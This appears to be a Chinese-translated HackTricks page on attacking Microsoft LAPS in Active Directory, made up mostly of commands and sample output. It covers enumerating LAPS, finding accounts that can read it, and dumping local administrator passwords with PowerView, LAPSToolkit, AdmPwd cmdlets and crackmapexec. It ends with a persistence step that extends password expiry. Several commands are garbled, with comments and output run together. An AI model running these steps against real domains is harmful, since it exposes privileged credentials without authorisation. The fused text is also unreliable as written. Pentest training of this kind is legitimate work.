regquery"HKLM\Software\Policies\Microsoft Services\AdmPwd"/vAdmPwdEnableddir"C:\Program Files\LAPS\CSE"# Check if that folder exists and contains AdmPwd.dll# Find GPOs that have "LAPS" or some other descriptive term in the nameGet-DomainGPO|?{ $_.DisplayName-like"*laps*"}|select DisplayName, Name, GPCFileSysPath |fl# Search computer objects where the ms-Mcs-AdmPwdExpirationTime property is not null (any Domain User can read this property)
Get-DomainObject -SearchBase "LDAP://DC=sub,DC=domain,DC=local" | ? { $_."ms-mcs-admpwdexpirationtime" -ne $null } | select DnsHostname
LAPS 密码访问
您可以从 \\dc\SysVol\domain\Policies\{4A8A4E8E-929F-401A-95BD-A7D40E0976C8}\Machine\Registry.pol下载原始 LAPS 策略,然后使用 GPRegistryPolicyParser 包中的 Parse-PolFile 将此文件转换为人类可读的格式。
此外,如果在我们可以访问的机器上安装了 本地 LAPS PowerShell cmdlets,也可以使用它们:
Get-Command*AdmPwd*CommandType Name Version Source----------------------------Cmdlet Find-AdmPwdExtendedRights5.0.0.0 AdmPwd.PSCmdlet Get-AdmPwdPassword5.0.0.0 AdmPwd.PSCmdlet Reset-AdmPwdPassword5.0.0.0 AdmPwd.PSCmdlet Set-AdmPwdAuditing5.0.0.0 AdmPwd.PSCmdlet Set-AdmPwdComputerSelfPermission5.0.0.0 AdmPwd.PSCmdlet Set-AdmPwdReadPasswordPermission5.0.0.0 AdmPwd.PSCmdlet Set-AdmPwdResetPasswordPermission5.0.0.0 AdmPwd.PSCmdlet Update-AdmPwdADSchema5.0.0.0 AdmPwd.PS# List who can read LAPS password of the given OUFind-AdmPwdExtendedRights-Identity Workstations | fl# Read the passwordGet-AdmPwdPassword-ComputerName wkstn-2| fl
PowerView 还可以用来找出 谁可以读取密码并读取它:
# Find the principals that have ReadPropery on ms-Mcs-AdmPwdGet-AdmPwdPassword-ComputerName wkstn-2| fl# Read the passwordGet-DomainObject-Identity wkstn-2-Properties ms-Mcs-AdmPwd
LAPSToolkit
LAPSToolkit 通过几个功能促进了 LAPS 的枚举。
其中之一是解析 ExtendedRights 以获取 所有启用 LAPS 的计算机。 这将显示 专门被委派读取 LAPS 密码的组, 这些组通常是受保护组中的用户。
一个 已将计算机 加入域的 帐户 会获得该主机的 All Extended Rights,而这个权限使得 帐户 能够 读取密码。 枚举可能会显示一个可以在主机上读取 LAPS 密码的用户帐户。这可以帮助我们 针对特定的 AD 用户,他们可以读取 LAPS 密码。
# Get groups that can read passwordsFind-LAPSDelegatedGroupsOrgUnit Delegated Groups-----------------------OU=Servers,DC=DOMAIN_NAME,DC=LOCAL DOMAIN_NAME\Domain AdminsOU=Workstations,DC=DOMAIN_NAME,DC=LOCAL DOMAIN_NAME\LAPS Admin# Checks the rights on each computer with LAPS enabled for any groups# with read access and users with "All Extended Rights"Find-AdmPwdExtendedRightsComputerName Identity Reason--------------------------MSQL01.DOMAIN_NAME.LOCAL DOMAIN_NAME\Domain Admins DelegatedMSQL01.DOMAIN_NAME.LOCAL DOMAIN_NAME\LAPS Admins Delegated# Get computers with LAPS enabled, expirations time and the password (if you have access)Get-LAPSComputersComputerName Password Expiration------------------------------DC01.DOMAIN_NAME.LOCAL j&gR+A(s976Rf%12/10/202213:24:41
通过 Crackmapexec 转储 LAPS 密码
如果无法访问 PowerShell,您可以通过 LDAP 远程利用此权限。
crackmapexec ldap 10.10.10.10 -u user -p password --kdcHost 10.10.10.10 -M laps
# Get expiration timeGet-DomainObject-Identity computer-21-Properties ms-mcs-admpwdexpirationtime# Change expiration time## It's needed SYSTEM on the computerSet-DomainObject-Identity wkstn-2-Set @{"ms-mcs-admpwdexpirationtime"="232609935231523081"}
HackTricks Training AWS Red Team Expert (ARTE)
HackTricks Training GCP Red Team Expert (GRTE)
